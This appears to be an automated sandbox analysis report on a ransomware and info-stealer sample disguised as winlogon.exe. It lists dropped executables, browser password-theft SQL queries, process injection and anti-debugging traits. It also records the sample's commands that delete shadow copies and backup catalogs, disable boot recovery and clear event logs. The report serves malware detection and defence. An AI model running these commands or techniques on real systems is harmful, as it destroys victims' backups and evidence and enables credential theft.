Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: winlogon.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directoryShow sources
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Binary contains paths to debug symbolsShow sources
Source: Binary string: KERBEROS.pdb source: ucngw.exe
Source: Binary string: msv1_0.pdb source: ucngw.exe
Source: Binary string: lsasrv.pdb source: ucngw.exe
PE file contains a valid data directory to section mappingShow sources
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)Show sources
Source: _wjg.exe.1.drBinary string: Sysinternals RocksRtlNtStatusToDosErrorntdll.dllRtlInitUnicodeStringNtOpenFileNtFsControlFile\Device\Srv2\Device\LanmanServerSeTcbPrivilege"%s" %sNetIsServiceAccountnetapi32.dll_SA_{262E99C9-6160-4871-ACEC-4E61736B6F21}NT AUTHORITYNT SERVICECreateRestrictedTokenwinsta0Winlogondefaultwinsta0\winlogonwinsta0\defaultWow64DisableWow64FsRedirectionKernel32.dll%s.exefailed to readsecure: %d
Source: _wjg.exe.1.drBinary string: Sysinternals RocksRtlNtStatusToDosErrorntdll.dllRtlInitUnicodeStringNtOpenFileNtFsControlFile\Device\LanmanRedirector\%s\ipc$Use PsKill to terminate the remotely running program.
Classification labelShow sources
Source: classification engineClassification label: mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D62B90 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle,1_2_00D62B90
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013335E0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle,2_2_013335E0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C61A30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle,3_2_00C61A30
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCode function: 4_2_001416E9 Wow64DisableWow64FsRedirection,LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,Wow64RevertWow64FsRedirection,CreateThread,Sleep,InitiateSystemShutdownExW,ExitProcess,4_2_001416E9
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D64C30 CoInitializeEx,CoInitializeSecurity,CredUIParseUserNameW,LocalAlloc,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysStringLen,SysStringLen,SysStringLen,SysStringLen,CoCreateInstance,SysFreeString,wsprintfW,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoSetProxyBlanket,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,VariantClear,SysAllocString,SysAllocString,GetModuleFileNameW,CreateFileW,GetFileSize,SafeArrayCreate,SafeArrayAccessData,ReadFile,SafeArrayUnaccessData,CloseHandle,CloseHandle,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,LocalFree,CoUninitialize,1_2_00D64C30
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6AAD0 GetModuleHandleW,FindResourceW,LoadResource,LockResource,SizeofResource,1_2_00D6AAD0
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCode function: 4_2_001412E8 OpenSCManagerW,EnumServicesStatusW,EnumServicesStatusW,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusW,QueryServiceConfigW,OpenServiceW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,ChangeServiceConfigW,QueryServiceConfigW,PathRemoveArgsW,GetProcessHeap,HeapFree,GetLastError,CloseServiceHandle,GetProcessHeap,HeapFree,CloseServiceHandle,4_2_001412E8
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\winlogon.exeFile created: C:\Users\Public\A9E5CC701A2E98F9114060D6645A7A5B
Creates temporary filesShow sources
Source: C:\Users\user\Desktop\winlogon.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\yegus.exe
Might use command line argumentsShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCommand line argument: <NULL>2_2_013338C0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCommand line argument: <NULL>2_2_013338C0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCommand line argument: <NULL>3_2_00C61EC0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCommand line argument: <NULL>3_2_00C61EC0
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCommand line argument: wbadmin.exe4_2_001416E9
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCommand line argument: bcdedit.exe4_2_001416E9
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCommand line argument: wevtutil.exe4_2_001416E9
PE file has an executable .text section and no other executable sectionShow sources
Source: winlogon.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini filesShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Reads software policiesShow sources
Source: C:\Users\user\Desktop\winlogon.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
SQL strings found in memory and binary dataShow sources
Source: yegus.exeBinary or memory string: SELECT origin_url, username_value, password_value FROM logins;`R
Source: yegus.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: yegus.exeBinary or memory string: SELECT origin_url, username_value, password_value FROM logins;
Source: yegus.exeBinary or memory string: SELECT formSubmitURL, encryptedUsername, encryptedPassword FROM moz_logins;
Source: yegus.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: yegus.exeBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: yegus.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Sample is known by Antivirus (Virustotal or Metascan)Show sources
Source: winlogon.exeVirustotal: hash found
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\winlogon.exe 'C:\Users\user\Desktop\winlogon.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\yegus.exe 123 \\.\pipe\122B85FE-84BD-45AB-AEE5-28D37FB4C464
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ucngw.exe 123 \\.\pipe\33F83B68-FC3D-4C1F-B4AE-1329770D367B
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\_usm.exe C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: unknownProcess created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
Source: unknownProcess created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quiet
Source: unknownProcess created: C:\Windows\System32\wbengine.exe C:\Windows\system32\wbengine.exe
Source: unknownProcess created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding
Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
Source: unknownProcess created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl System
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
Source: unknownProcess created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl Security
Source: unknownProcess created: C:\Windows\System32\LogonUI.exe 'LogonUI.exe' /flags:0x0
Source: unknownProcess created: C:\Windows\System32\LogonUI.exe unknown
Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Users\user\AppData\Local\Temp\yegus.exe 123 \\.\pipe\122B85FE-84BD-45AB-AEE5-28D37FB4C464
Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Users\user\AppData\Local\Temp\ucngw.exe 123 \\.\pipe\33F83B68-FC3D-4C1F-B4AE-1329770D367B
Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Users\user\AppData\Local\Temp\_usm.exe C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe
Source: C:\Users\user\AppData\Local\Temp\_usm.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: C:\Users\user\AppData\Local\Temp\_usm.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
Source: C:\Users\user\AppData\Local\Temp\_usm.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Source: C:\Users\user\AppData\Local\Temp\_usm.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
Source: C:\Users\user\AppData\Local\Temp\_usm.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quiet
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl System
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl Security
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\winlogon.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)Show sources
Source: winlogon.exeStatic PE information: Section: .rsrc ZLIB complexity 1.00009145872
Source: yegus.exe.1.drStatic PE information: Section: .rsrc ZLIB complexity 0.999364306084
Source: ucngw.exe.1.drStatic PE information: Section: .rsrc ZLIB complexity 0.995655293367
Source: _yig.exe.1.drStatic PE information: Section: .rsrc ZLIB complexity 1.00009145872
Contains functionality to call native functionsShow sources
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_100147C0 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,LocalFree,3_2_100147C0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_10013CB0 LoadLibraryW,GetModuleHandleW,NtQueryInformationProcess,3_2_10013CB0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_100145E0 GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb,3_2_100145E0
Creates files inside the system directoryShow sources
Source: C:\Windows\System32\wbadmin.exeFile created: C:\Windows\Logs\WindowsBackup
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D7989E1_2_00D7989E
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D793F01_2_00D793F0
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6F6CE1_2_00D6F6CE
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D7CF3F1_2_00D7CF3F
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D611101_2_00D61110
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D693301_2_00D69330
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D618701_2_00D61870
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D68EE01_2_00D68EE0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013313702_2_01331370
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_0133E8FF2_2_0133E8FF
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013315E02_2_013315E0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013310A02_2_013310A0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_01332B702_2_01332B70
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013332D02_2_013332D0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100641402_2_10064140
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100196A02_2_100196A0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100291302_2_10029130
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1003C8802_2_1003C880
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10053C802_2_10053C80
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100658702_2_10065870
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100804F02_2_100804F0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100270502_2_10027050
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100060222_2_10006022
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100078702_2_10007870
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10005C302_2_10005C30
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1006F8102_2_1006F810
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10036CD02_2_10036CD0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1003B6A02_2_1003B6A0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10008D502_2_10008D50
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100794592_2_10079459
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10022AD02_2_10022AD0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100780602_2_10078060
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100170502_2_10017050
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100022002_2_10002200
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1002DD282_2_1002DD28
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100747802_2_10074780
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10021F802_2_10021F80
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1001EBB02_2_1001EBB0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1001CFF02_2_1001CFF0
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1008DE012_2_1008DE01
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100722E02_2_100722E0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C5FC903_2_00C5FC90
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C60F403_2_00C60F40
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C5D39F3_2_00C5D39F
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C5FD203_2_00C5FD20
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C611503_2_00C61150
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C5F3F03_2_00C5F3F0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C5F6A03_2_00C5F6A0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_100049503_2_10004950
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_100039B33_2_100039B3
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_1000F8983_2_1000F898
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_10003C103_2_10003C10
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_1000B61E3_2_1000B61E
Enables security privilegesShow sources
Source: C:\Users\user\Desktop\winlogon.exeProcess token adjusted: Security
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: String function: 00D6B650 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: String function: 100071E0 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: String function: 10024C30 appears 105 times
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: String function: 10007480 appears 193 times
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: String function: 10008070 appears 167 times
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: String function: 00C51CA0 appears 32 times
PE file contains executable resources (Code or Archives)Show sources
Source: _wjg.exe.1.drStatic PE information: Resource name: BINRES type: PE32 executable (console) Intel 80386, for MS Windows
Reads the hosts fileShow sources
Source: C:\Users\user\Desktop\winlogon.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\winlogon.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\winlogon.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\winlogon.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\winlogon.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\winlogon.exeFile read: C:\Windows\System32\drivers\etc\hosts
Sample file is different than original file name gathered from version infoShow sources
Source: winlogon.exeBinary or memory string: OriginalFilenamepsexec.cH vs winlogon.exe
Source: winlogon.exeBinary or memory string: OriginalFilenamepsexesvc.exeH vs winlogon.exe
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\winlogon.exeFile read: C:\Users\user\Desktop\winlogon.exe
Tries to load missing DLLsShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll

HIPS / PFW / Operating System Protection Evasion:

barindex
Contains functionality to execute programs as a different userShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D63920 LogonUserA,GetLastError,DeleteCriticalSection,1_2_00D63920
Contains functionality to inject code into remote processesShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D65DD0 ExitProcess,Sleep,DeleteFileW,GetFileSize,WriteFile,GetFileAttributesW,CreateFileW,CloseHandle,GetModuleHandleW,GetModuleFileNameW,GetWindowsDirectoryW,CreateProcessW,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,TerminateProcess,CloseHandle,1_2_00D65DD0
Contains functionality to inject threads in other processesShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D65DD0 ExitProcess,Sleep,DeleteFileW,GetFileSize,WriteFile,GetFileAttributesW,CreateFileW,CloseHandle,GetModuleHandleW,GetModuleFileNameW,GetWindowsDirectoryW,CreateProcessW,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,TerminateProcess,CloseHandle,1_2_00D65DD0

Anti Debugging:

barindex
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6B598 SetUnhandledExceptionFilter,1_2_00D6B598
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6AE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00D6AE70
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6B406 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D6B406
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D7009F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D7009F
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013347F1 SetUnhandledExceptionFilter,2_2_013347F1
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013346A3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_013346A3
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013340FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_013340FB
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_013372DB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_013372DB
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100827CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_100827CB
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1008657C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_1008657C
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10083265 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_10083265
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C51BE9 SetUnhandledExceptionFilter,3_2_00C51BE9
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C54CBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00C54CBD
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C514CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00C514CB
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C51A54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00C51A54
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_10001795 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_10001795
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_1000662D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1000662D
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_10001B37 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10001B37
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCode function: 4_2_001417EA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_001417EA
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCode function: 4_2_0014333B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0014333B
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Users\user\Desktop\winlogon.exeSystem information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6B406 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D6B406
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D643A0 GetVersionExW,LoadLibraryW,GetProcAddress,SHGetKnownFolderPath,1_2_00D643A0
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D70D28 mov eax, dword ptr fs:[00000030h]1_2_00D70D28
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_01337F59 mov eax, dword ptr fs:[00000030h]2_2_01337F59
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10085756 mov eax, dword ptr fs:[00000030h]2_2_10085756
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C558EB mov eax, dword ptr fs:[00000030h]3_2_00C558EB
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_100051BB mov eax, dword ptr fs:[00000030h]3_2_100051BB
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6A6F0 GetProcessHeap,RtlAllocateHeap,1_2_00D6A6F0
Enables debug privilegesShow sources
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeProcess token adjusted: Debug

Malware Analysis System Evasion:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D75F8F FindFirstFileExW,1_2_00D75F8F
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_01339A82 FindFirstFileExW,2_2_01339A82
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_10088620 FindFirstFileExA,2_2_10088620
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_00C5850A FindFirstFileExW,3_2_00C5850A
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCode function: 3_2_10008EEC FindFirstFileExA,3_2_10008EEC
Source: C:\Users\user\AppData\Local\Temp\_usm.exeCode function: 4_2_00141441 wsprintfW,FindFirstFileW,GetProcessHeap,PathAppendW,GetProcessHeap,HeapAlloc,PathAppendW,PathAppendW,StrCmpCW,StrCmpCW,StrCmpCW,CreateFileW,GetFileSizeEx,CloseHandle,GetProcessHeap,HeapFree,FindNextFileW,FindClose,4_2_00141441
Contains functionality to query system informationShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_1000D3F0 GetSystemInfo,2_2_1000D3F0
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: wbadmin.exeBinary or memory string: Cluster service, and Hyper-V for more information.
Source: wbadmin.exeBinary or memory string: An error occurred while preparing to back up Hyper-V data.
Program exit pointsShow sources
Source: C:\Users\user\AppData\Local\Temp\_usm.exeAPI call chain: ExitProcess graph end node
Queries a list of all running processesShow sources
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeProcess information queried: ProcessInformation
Contains functionality to enumerate running servicesShow sources
